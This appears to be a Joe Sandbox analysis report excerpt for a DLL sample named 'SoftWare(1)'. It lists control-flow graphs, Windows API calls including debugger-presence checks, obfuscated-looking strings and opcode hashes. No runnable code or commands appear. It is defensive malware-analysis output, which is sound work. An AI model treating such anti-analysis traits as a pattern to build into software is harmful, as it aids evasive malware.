                                                                                      control_flow_graph 1572 6cf5effe-6cf5f00f call 6cf5f800 1575 6cf5f011-6cf5f017 1572->1575 1576 6cf5f020-6cf5f027 1572->1576 1575->1576 1577 6cf5f019-6cf5f01b 1575->1577 1578 6cf5f033-6cf5f047 dllmain_raw 1576->1578 1579 6cf5f029-6cf5f02c 1576->1579 1580 6cf5f0f9-6cf5f108 1577->1580 1582 6cf5f0f0-6cf5f0f7 1578->1582 1583 6cf5f04d-6cf5f05e dllmain_crt_dispatch 1578->1583 1579->1578 1581 6cf5f02e-6cf5f031 1579->1581 1584 6cf5f064-6cf5f076 call 6cf542c0 1581->1584 1582->1580 1583->1582 1583->1584 1587 6cf5f09f-6cf5f0a1 1584->1587 1588 6cf5f078-6cf5f07a 1584->1588 1589 6cf5f0a3-6cf5f0a6 1587->1589 1590 6cf5f0a8-6cf5f0b9 dllmain_crt_dispatch 1587->1590 1588->1587 1591 6cf5f07c-6cf5f09a call 6cf542c0 call 6cf5ef4e dllmain_raw 1588->1591 1589->1582 1589->1590 1590->1582 1592 6cf5f0bb-6cf5f0ed dllmain_raw 1590->1592 1591->1587 1592->1582
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                      • String ID:
                                                                                      • API String ID: 3136044242-0
                                                                                      • Opcode ID: 9b642cedf29bac63461211d0dd0bbb9d426e4af442384f27e158e95a101cccdb
                                                                                      • Instruction ID: 4f7933cd512109e36316183f4a870ba45fdd2f316645396b41476127c5defb45
                                                                                      • Opcode Fuzzy Hash: 9b642cedf29bac63461211d0dd0bbb9d426e4af442384f27e158e95a101cccdb
                                                                                      • Instruction Fuzzy Hash: CF21F772D05225EBCBA18F65CC40BAF3E79DB90B98F954195FA1457700D7318D218BE0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 6CF6676C
                                                                                        • Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CF667A4
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CF667C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: 16917e9c6cc8ac1dee4e89c6016506c4ea41628202af2f6db1fea0e611fec3c5
                                                                                      • Instruction ID: b6f2309f8db0014fa9d9515a3eacd70850f49c8e91c1e9750097e552017c0c0a
                                                                                      • Opcode Fuzzy Hash: 16917e9c6cc8ac1dee4e89c6016506c4ea41628202af2f6db1fea0e611fec3c5
                                                                                      • Instruction Fuzzy Hash: B611A1B2A05516BEAA0116775CCDDAFBA7CDF8629C7610424F512E1E00FE75CD1482B1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1624 6cf5ee47-6cf5ee55 call 6cf5f800 call 6cf5f4e3 1628 6cf5ee5a-6cf5ee5d 1624->1628 1629 6cf5ef34 1628->1629 1630 6cf5ee63-6cf5ee7b call 6cf5f3e8 1628->1630 1632 6cf5ef36-6cf5ef45 1629->1632 1634 6cf5ef46-6cf5ef4d call 6cf5f682 1630->1634 1635 6cf5ee81-6cf5ee92 call 6cf5f445 1630->1635 1640 6cf5ee94-6cf5eeb6 call 6cf5f79f call 6cf5f363 call 6cf5f387 call 6cf63a09 1635->1640 1641 6cf5eee1-6cf5eeef call 6cf5ef2a 1635->1641 1640->1641 1660 6cf5eeb8-6cf5eebf call 6cf5f41a 1640->1660 1641->1629 1646 6cf5eef1-6cf5eefb call 6cf5f67c 1641->1646 1652 6cf5eefd-6cf5ef06 call 6cf5f5a3 1646->1652 1653 6cf5ef1c-6cf5ef25 1646->1653 1652->1653 1659 6cf5ef08-6cf5ef1a 1652->1659 1653->1632 1659->1653 1660->1641 1664 6cf5eec1-6cf5eede call 6cf639de 1660->1664 1664->1641
                                                                                      APIs
                                                                                      • __RTC_Initialize.LIBCMT ref: 6CF5EE94
                                                                                        • Part of subcall function 6CF5F363: InitializeSListHead.KERNEL32(6CFC74C0,6CF5EE9E,6CF72F40,00000010,6CF5EE2F,?,?,?,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88), ref: 6CF5F368
                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF5EEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                      • String ID:
                                                                                      • API String ID: 3231365870-0
                                                                                      • Opcode ID: f992ea191da86df2126045102a413017f9f4c6d9078b1567f46731dc3efc3ca9
                                                                                      • Instruction ID: 1b663310ff7c5b769036ebc869aae82dcde8eb57c27daf312d6494c58e862a9f
                                                                                      • Opcode Fuzzy Hash: f992ea191da86df2126045102a413017f9f4c6d9078b1567f46731dc3efc3ca9
                                                                                      • Instruction Fuzzy Hash: EC210531B593069EEB44ABB5D8007DD3BA14F3632CFA10499D7902BFC1CB7B016986A5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1667 6cf66d61-6cf66d66 1668 6cf66d68-6cf66d80 1667->1668 1669 6cf66d82-6cf66d86 1668->1669 1670 6cf66d8e-6cf66d97 1668->1670 1669->1670 1673 6cf66d88-6cf66d8c 1669->1673 1671 6cf66da9 1670->1671 1672 6cf66d99-6cf66d9c 1670->1672 1677 6cf66dab-6cf66db8 GetStdHandle 1671->1677 1675 6cf66da5-6cf66da7 1672->1675 1676 6cf66d9e-6cf66da3 1672->1676 1674 6cf66e03-6cf66e07 1673->1674 1674->1668 1680 6cf66e0d-6cf66e10 1674->1680 1675->1677 1676->1677 1678 6cf66de5-6cf66df7 1677->1678 1679 6cf66dba-6cf66dbc 1677->1679 1678->1674 1682 6cf66df9-6cf66dfc 1678->1682 1679->1678 1681 6cf66dbe-6cf66dc7 GetFileType 1679->1681 1681->1678 1683 6cf66dc9-6cf66dd2 1681->1683 1682->1674 1684 6cf66dd4-6cf66dd8 1683->1684 1685 6cf66dda-6cf66ddd 1683->1685 1684->1674 1685->1674 1686 6cf66ddf-6cf66de3 1685->1686 1686->1674
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6CF66DAD
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 6CF66DBF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType
                                                                                      • String ID:
                                                                                      • API String ID: 3000768030-0
                                                                                      • Opcode ID: 9c60979dff5be0ce33233b29dba779ce05df35eb8d45fbe64fc0cd09221de6d6
                                                                                      • Instruction ID: 62439c7d921ae6df4c45fb2ce465938caf19bcbd20b058b6e3289e15c664a7d8
                                                                                      • Opcode Fuzzy Hash: 9c60979dff5be0ce33233b29dba779ce05df35eb8d45fbe64fc0cd09221de6d6
                                                                                      • Instruction Fuzzy Hash: E4118E726087524ADB204E3FCC89B53BAA5AB57278B38071EF4B6C6DE1C331D586C684

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1687 6cf65062-6cf6506e 1688 6cf650a0-6cf650ab call 6cf651d3 1687->1688 1689 6cf65070-6cf65072 1687->1689 1696 6cf650ad-6cf650af 1688->1696 1690 6cf65074-6cf65075 1689->1690 1691 6cf6508b-6cf6509c RtlAllocateHeap 1689->1691 1690->1691 1694 6cf65077-6cf6507e call 6cf67fce 1691->1694 1695 6cf6509e 1691->1695 1694->1688 1699 6cf65080-6cf65089 call 6cf63935 1694->1699 1695->1696 1699->1688 1699->1691
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,6CF6606C,?,?,6CF6606C,00000220,?,00000000,?), ref: 6CF65094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: f4a8ccdd5eaaaa70b56ef3ad25e368217614c7c68214fcd83cff0774289bada8
                                                                                      • Instruction ID: 5dde18bee5150f8bd06403fa5b27e5ca0dc7df55f2a363dd6ebfea3925817551
                                                                                      • Opcode Fuzzy Hash: f4a8ccdd5eaaaa70b56ef3ad25e368217614c7c68214fcd83cff0774289bada8
                                                                                      • Instruction Fuzzy Hash: 87E09B336452177AFB1116E7CC00F9B37589F437A4F610211EC96F6D83DB60D80586E4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C])$vJ<$vJ<$&3$&3
                                                                                      • API String ID: 0-300973795
                                                                                      • Opcode ID: 0aeb6a0bd7c296570a60e3a4c3614689bca13f3b098e4c1c57a4b449afe2a04d
                                                                                      • Instruction ID: 9ff4a167157e3db4b45740a2220971ad9292d7b6cb944b4e54a63b40a7ca748f
                                                                                      • Opcode Fuzzy Hash: 0aeb6a0bd7c296570a60e3a4c3614689bca13f3b098e4c1c57a4b449afe2a04d
                                                                                      • Instruction Fuzzy Hash: 57623477B542058FCF09CE7CC5D43EF3BF2AB56310F60811AD621D7B94D62A8A6A8B50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: E$bxjwdhkoiousbe$hodebemmfvqcnjjhazithsrm$l|` $u7q@
                                                                                      • API String ID: 0-133057723
                                                                                      • Opcode ID: 7f4c9f2382f9c7a1d172e3cdfadcff7fb5e6c70b1356adb0674890c65b468dd3
                                                                                      • Instruction ID: 175ec5d4d40304f65a450bd2b09b0cd93e4f2bb04d0755486aa81a2d74fd66b9
                                                                                      • Opcode Fuzzy Hash: 7f4c9f2382f9c7a1d172e3cdfadcff7fb5e6c70b1356adb0674890c65b468dd3
                                                                                      • Instruction Fuzzy Hash: 1A5206726593028FD704DE3CC4953DF7FE2AB93324F508A1DE4A58BA96C639C54E8B42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;juX$;juX$GjZ0$L~L$L~L
                                                                                      • API String ID: 0-683031464
                                                                                      • Opcode ID: fb848149050c25c51931393221d7fd934dc272b25a194672a53aa0332c0e3824
                                                                                      • Instruction ID: fbb03f0915dff381505b64a8a0e0c90027c9299909fcbfb76187c19198c91ff9
                                                                                      • Opcode Fuzzy Hash: fb848149050c25c51931393221d7fd934dc272b25a194672a53aa0332c0e3824
                                                                                      • Instruction Fuzzy Hash: 42D1F5B2A505058FDF08CE7CC4D53DF77F1AB16361F619119DA21ABB90CE3A8A0A8B54
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CF5F68E
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6CF5F75A
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF5F773
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6CF5F77D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 9560b8aa6ac444d5771dc7314b30e0f4f30a594976f277fd7e733482b1f49457
                                                                                      • Instruction ID: b888f8dd5b998fab92c56b6f727d3b1c155d6fd1506e851f5801e08662d6aa4b
                                                                                      • Opcode Fuzzy Hash: 9560b8aa6ac444d5771dc7314b30e0f4f30a594976f277fd7e733482b1f49457
                                                                                      • Instruction Fuzzy Hash: 0D311675D05219EBDF60DFA5D9897CDBBB8AF08304F1041EAE50CAB240EB709A85CF44
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CF63714
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CF6371E
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CF6372B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: e73275f27af2c424624095fa644ea298566b84c9bb95c3280f56b46c6db7a731
                                                                                      • Instruction ID: 66a5552eff761913c80caff389a8567361db72f5af1f7aa682c1c4852ffb755c
                                                                                      • Opcode Fuzzy Hash: e73275f27af2c424624095fa644ea298566b84c9bb95c3280f56b46c6db7a731
                                                                                      • Instruction Fuzzy Hash: 3B31E374D1122DABCB61DF65D988BCDBBB8BF08314F6041EAE41CA7250E7309B858F44
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ^!Jh$fzzv
                                                                                      • API String ID: 0-1917174378
                                                                                      • Opcode ID: 52b782c6f59d29b20744e169389846455fb2fad9593f42594837136dce29b794
                                                                                      • Instruction ID: fb69d622e69ecf89d2e2d3e40344091884c9f783e11826154c29d564f03d2bc4
                                                                                      • Opcode Fuzzy Hash: 52b782c6f59d29b20744e169389846455fb2fad9593f42594837136dce29b794
                                                                                      • Instruction Fuzzy Hash: 86F13836E45205CFCF04CEBCD5943DE7BF2EB1A354F608916D521EBBA4D22A8A188F15
                                                                                      Strings
                                                                                      • jfbwdbkpqbwyaothubqkevjuzzrcwlfuqckhwpdqnabwaxciahmdokqbmpdxxpdwkfaford, xrefs: 6CF466DE
                                                                                      • `rcN, xrefs: 6CF46A0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `rcN$jfbwdbkpqbwyaothubqkevjuzzrcwlfuqckhwpdqnabwaxciahmdokqbmpdxxpdwkfaford
                                                                                      • API String ID: 0-2495920147
                                                                                      • Opcode ID: ecb60929d22a95074c3bf5ed250e72e8528198b86a20f73c8b30566c868a735b
                                                                                      • Instruction ID: f0d23c11b2cc3bf7574ccca40fe64cfa1069b2e82e321671c9ab914599acce58
                                                                                      • Opcode Fuzzy Hash: ecb60929d22a95074c3bf5ed250e72e8528198b86a20f73c8b30566c868a735b
                                                                                      • Instruction Fuzzy Hash: FCE1A172654F408FC724CF2CC595797BBF1AB82324F10CA1AE4A6CBB56D635E90A8F44
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2:#$bad array new length
                                                                                      • API String ID: 0-3388646995
                                                                                      • Opcode ID: 93eeeaa4d644bdcaa0b80ebd7761cd85d448f7d0393ed0386f0a7553a00bf1e4
                                                                                      • Instruction ID: 1ea89ca0a0e602f6f2fb77dae4ac74f5ce304d32a9da911ef3356b7f865ac559
                                                                                      • Opcode Fuzzy Hash: 93eeeaa4d644bdcaa0b80ebd7761cd85d448f7d0393ed0386f0a7553a00bf1e4
                                                                                      • Instruction Fuzzy Hash: 4C413972A415098FCF04DEBCC4D57EF7BF5AB57324F514619C622ABB84D2315619CB80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ~w
                                                                                      • API String ID: 0-2615944315
                                                                                      • Opcode ID: bcbd40b9cf5a09921247a378a9f1404183942070892e57a4b059b0fabd96498b
                                                                                      • Instruction ID: 67a3e7a3b7b1add032ccf7ab1312d9ccedab5f97cd651a4dfa1ce02fdeedd1f0
                                                                                      • Opcode Fuzzy Hash: bcbd40b9cf5a09921247a378a9f1404183942070892e57a4b059b0fabd96498b
                                                                                      • Instruction Fuzzy Hash: 4D122336F451058FCB08CEBCD5C53DE7BF2AB6A310F609906E612E7B64D63A99158F10
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CF6B992,?,?,00000008,?,?,6CF6B595,00000000), ref: 6CF6BBC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: b196dcf3481d88d2bc21ef4241ec62309347f24604c15acb7d9be228c4c27700
                                                                                      • Instruction ID: ee01dccc5003c03c3f81b777f20e5f314709b2739abe34f8db79326ee14ebf7c
                                                                                      • Opcode Fuzzy Hash: b196dcf3481d88d2bc21ef4241ec62309347f24604c15acb7d9be228c4c27700
                                                                                      • Instruction Fuzzy Hash: B1B16B32210609DFD705CF29C486B557BE0FF05369F258A58F8A9CFAA1C735EA82DB40
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CF5F85E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: c783b69e000ec112ddbc0d0cc107c0a81e25fade772c9dc3a44d12566ed50fa7
                                                                                      • Instruction ID: be4f8cbcb5fa5e1ecaafb65d5ea44d504d5efdf2fd162763c7acf9a4c8e07a62
                                                                                      • Opcode Fuzzy Hash: c783b69e000ec112ddbc0d0cc107c0a81e25fade772c9dc3a44d12566ed50fa7
                                                                                      • Instruction Fuzzy Hash: 6A51ADB1F1561A9FEB89CF54C8817AEBBF0FB59314F2085AAD515EB280D374EA10CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
